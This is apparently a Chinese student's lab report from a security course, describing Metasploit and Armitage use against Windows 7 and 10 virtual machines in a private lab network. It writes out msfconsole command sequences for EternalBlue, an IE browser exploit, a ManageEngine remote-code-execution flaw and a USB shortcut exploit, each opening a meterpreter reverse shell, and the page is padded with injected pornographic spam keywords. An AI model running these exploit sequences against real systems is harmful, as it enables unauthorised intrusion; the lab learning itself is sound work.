<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      Exp5 MSF基礎應用

      • 一、知識點總結
      • 二、攻擊實例
        • 主動攻擊的實踐
          • ms08_067(win7)
            • payload/generic/shell_reverse_tcp(失敗)
            • payload/windows/meterpreter/reverse_tcp(失敗)
          • ms17_010_eternalblue(win7)
            • payload/windows/x64/meterpreter/reverse_tcp(成功)
        • 攻擊瀏覽器的實踐
            • ms11_050(win7)(成功)
          ms14_064(win7)  
            • exploit/windows/browser/ms14_064_ole_code_execution (失敗)
        • 攻擊客戶端的實踐
          • ManageEngine Applications Manager 13.5遠程代碼執行漏洞 (CVE-2018-7890)
            • manageengine_appmanager_exec (成功且唯一)
        • 成功應用任何一個輔助模塊
          • usb fileforma (成功)
      • 三、實驗總結
      一、知識點總結

      1.MSF攻擊方法

      • 主動攻擊:掃描主機漏洞,進行攻擊
      • 攻擊瀏覽器
      • 攻擊其他客戶端

      2.MSF的六種模塊

      • 滲透攻擊模塊Exploit Modules:攻擊漏洞,把shellcode"背"過去

        • 主動滲透攻擊:攻擊某個系統服務
        • 被動滲透攻擊:攻擊某個客戶端應用
      • 輔助模塊Auxiliary Modules:在進行滲透攻擊之前得到目標系統豐富的情報信息,它是攻擊的前提攻擊載荷Payload Modules:載荷,一段指令(shellcode),目標系統在被滲透攻擊之后去執行的代碼

        • 網絡服務的掃描與查點
        • 探查敏感信息泄露、Fuzz測試發掘漏洞
        • 收集登錄密碼
      • 空字段模塊Nop Modules

        • 一些對程序運行狀態不會造成任何實質影響的空操作或無關操作指令,即空指令(滑行區)
        • 由于系統無法精確計算shellcode的起始地址,所以加入nops以增加攻擊成功的概率
      • 編碼模塊Encoders后滲透攻擊模塊Post:攻擊成功之后,動態傳輸代碼使其在被控機執行

        • 改變payload形狀,使得不出現特定字符
        • 確保攻擊載荷中不會出現滲透攻擊過程中應加以避免的“壞字符”
      • 查看六種模塊源碼目錄/usr/share/metasploit-framework/modules

      3.MSF的三種用戶操作界面

       

      • msfconsole

        • 查看模塊的具體信息info [exploits|auxiliary|post|payloads|encoders|nops]
        • 查看設置信息show [options]
        • 查看攻擊目標類型show [target]
        • 查找命令search
          • 查找2016年產生的在windows平臺下的漏洞search ms16 type:exploit platform:windows
      • armitagewebgui

        • 啟動服務器service postgresql start

        • 啟動armitagearmitage

      二、攻擊實例

      沒實現ms08_067

      靶機:Microsoft Windows 7

      payload : generic/shell_reverse_tcp

      實驗步驟

      通過菜單欄圖標直接打開Armitag

      根據已知信息推導出目標主機所在網段的IP,掃描目標網段完整信息,確認目標網絡拓撲結構以實施網絡偵查。依次選擇Hosts->Nmap Scan->Quick Scan(OS detect)

       

      虛擬機所在網段位192.168.80.0/24

       

      Win10虛擬機IP信息

       

      掃描后得到網段中4個虛擬機包括主機

       

      選中靶機192.168.80.137,右鍵選擇Services,查看靶機上開啟的服務:

       

      選中靶機192.168.80.137,右鍵選擇ScanArmitage會調用Metasploit的漏洞掃描模塊,定向掃描靶機,尋找存在的漏洞,為下一步確定攻擊方法提供參考依據

       

      可見類似前幾次實驗在Metasploit中手動配置主機號、端口號等設置現在統統直接自動化了!

      利用上一步中漏洞掃描得到的漏洞信息,自動搜索Metasploit攻擊模塊庫,尋找合適的攻擊模塊。選中靶機192.168.80.137,依次選擇菜單欄Attacks->Find AttacksArmitage會開始自動搜索尋找合適的攻擊模塊:

       

      在利用Armitage完成對靶機的攻擊模塊自動化搜索以后,選中192.168.80.137機右鍵可以發現多了Attack菜單。依次選擇Attack->smb->ms08_067_netapi菜單,選擇smb漏洞下的ms08_067漏洞對WIN7靶機進行攻擊(也可以在Armitage左側樹型目錄下依次選擇exploit->windows->smb->ms08_067_netapi找到該漏洞):

       

      launch一下,不行!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

      為啥???然后我去看了一下適用系統,沒有win7我哭了,我之前在做啥子?

       

       實現MS17_010_eternalblue

      靶機:Microsoft Windows 7

      payload :windows/meterpreter/reverse_tcp

      實驗步驟

       依然鐵頭娃,這次手動配置(肯定是能成功的)

       1 use auxiliary/scanner/smb/smb_ms17_010
       2 set RHOST 192.168.80.141
       3 Run
       4 Back
       5 search ms17_010
       6 use exploit/windows/smb/ms17_010_eternalblue
       7 set RHOST 192.168.80.141
       8 show options
       9 set payload windows/meterpreter/reverse_tcp
      10 set LHOST 192.168.80.130
      11 run

      實現ms11_050

      靶機:Microsoft Windows 7 + IE8

      payload : windows/meterpreter/reverse_tcp

      實驗步驟

      1 search ms11_050
      2 use exploit/windows/browser/ms11_050_mshtml_cobjectelement
      3 set srvhost 192.168.80.130
      4 set payload windows/meterpreter/reverse_tcp
      5 set LHOST 192.168.80.130
      6 show targets
      7 set target 4
      8 Run
      9 http://192.168.80.130:8080/zrCOkaFC

      實現CVE-2018-7890

      靶機:Windows 10

      實現這一攻擊需要ManageEngine Applications Manager 13.5,網上有相關警報書

      網絡上通用版本為13.5(試用版30天),實際上不怎么好用。。。只需要啟動驗證服務,但也不是每次都能成功地 (我也試了半天才成功,成功之后電腦藍屏我還沒快照 o(╥﹏╥)o)

      1 use exploit/windows/http/manageengine_appmanager_exec
      2 show options
      3 set RHOST 192.168.80.136
      4 Set RPORT 6305
      5 set LHOST 192.168.80.130
      6 set payload windows/meterpreter/reverse_tcp
      7 exploit

      雖然顯示的是13版本,但安裝的時候顯示的13.5安裝.......我也不知道怎么回事可能不顯示之后的版本號吧

       

      實現CVE-2017-8464

      攻擊靶機:Win7

      1 use exploit/windows/fileformat/cve_2017_8464_lnk_rce
      2 set payload windows/meterpreter/reverse_tcp
      3 set LHOST 192.168.80.130
      4 exploit
      5 cp -r /root/.msf4/local/ /media/root/KINGSTON
      6 use multi/handler
      7 set paylaod windows/meterpreter/reverse_tcp
      8 set LHOST 192.168.80.130
      9 Exploit

      這里要注意系統要開啟U盤自動播放,如果沒開啟雙擊第一個文件就行

      實驗感想

      做攻擊之前,要看看攻擊對當前版本是否可行,避免出現鐵頭娃現象。對于不同的攻擊,可能有一次不行之后就成功的現象,要多次嘗試分析其中的原因才能進行判斷。由于我的實驗中基本使用win7和win10,所以大部分早起漏洞都修補了,找新漏洞就有些困難,尤其是win10找了半天才試出來一個,幸好那個漏洞軟件公司沒有修補,要不再找一個唯一還會花很長時間。

      posted @ 2019-04-19 11:26  111134  閱讀(317)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 国产精品成人aaaaa网站| 国产伦码精品一区二区| 国产线播放免费人成视频播放 | 国产精品人妻一区二区高| 精品国产乱弄九九99久久| 97欧美精品系列一区二区| 91精品国产麻豆国产自产| 久久精品国产久精国产| 无码国产玉足脚交极品播放| 狠狠色狠狠色综合久久蜜芽| 荥阳市| 久99久热这里只有精品| 高清有码国产一区二区| 久久亚洲精品亚洲人av| 日韩美a一级毛片| 国产精品中文字幕自拍| 国产人妻精品午夜福利免费 | 中文字幕一区二区网站| 99精品国产中文字幕| 久久99九九精品久久久久蜜桃| 五月婷婷中文字幕| 黑人玩弄人妻中文在线| 亚洲色偷拍区另类无码专区| 亚洲欧洲av一区二区久久| 亚洲天堂av日韩精品| gogo无码大胆啪啪艺术| 国产精品69人妻我爱绿帽子| 特黄三级又爽又粗又大| 久久天天躁狠狠躁夜夜不卡| 精品无码一区在线观看| 国产精品男女午夜福利片| 在线精品视频一区二区三四| 亚洲一级特黄大片在线观看| 噜噜综合亚洲av中文无码| 男人扒女人添高潮视频| 午夜AAAAA级岛国福利在线| 天天色综网| 国产精品免费视频不卡| 国产亚洲精品aaaa片app| 亚洲国产精品男人的天堂| 亚洲国产午夜精品福利|